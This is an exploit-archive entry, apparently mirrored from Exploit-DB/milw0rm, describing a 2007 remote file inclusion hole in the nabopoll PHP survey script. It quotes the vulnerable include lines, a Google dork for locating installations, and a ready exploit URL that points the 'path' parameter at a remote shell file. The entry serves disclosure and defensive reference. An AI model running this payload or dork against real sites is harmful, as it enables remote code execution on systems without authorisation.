header-logo
Suggest Exploit
vendor:
nabopoll
by:
Cr@zy_King
N/A
CVSS
HIGH
Remote File .nclude
CWE
Product Name: nabopoll
Affected Version From: nabopoll 1.x
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Remote File .nclude

This exploit allows an attacker to include remote files by manipulating the 'path' parameter in the 'survey.inc.php' file of the 'nabopoll' script. By providing a malicious URL as the 'path' parameter, an attacker can execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the 'nabopoll' script or apply the necessary security measures to prevent unauthorized file inclusion.
Source

Exploit-DB raw data:

By Cr@zy_King

crazy_king@eno7.org

Thakns : ApAci & Erne & Uyussman & Eno7 & Thehacker & Crackers_Child & Liz0zim

Script : nabopoll 1.x

Risk : Remote File .nclude | High

Site : http://nabocorp.com/

Google Dork : inurl:"nabopoll/"

Exploit :
include_once($path."includes/tags.inc.php");
include_once($path."config.inc.php");

Files: survey.inc.php

Exploit : http://www.site.com/[path]/survey.inc.php?path=http://sheel.txt?

Ayyildiz.Org Present

# milw0rm.com [2007-02-15]

Navigation

Suggest Exploit

Services By CQR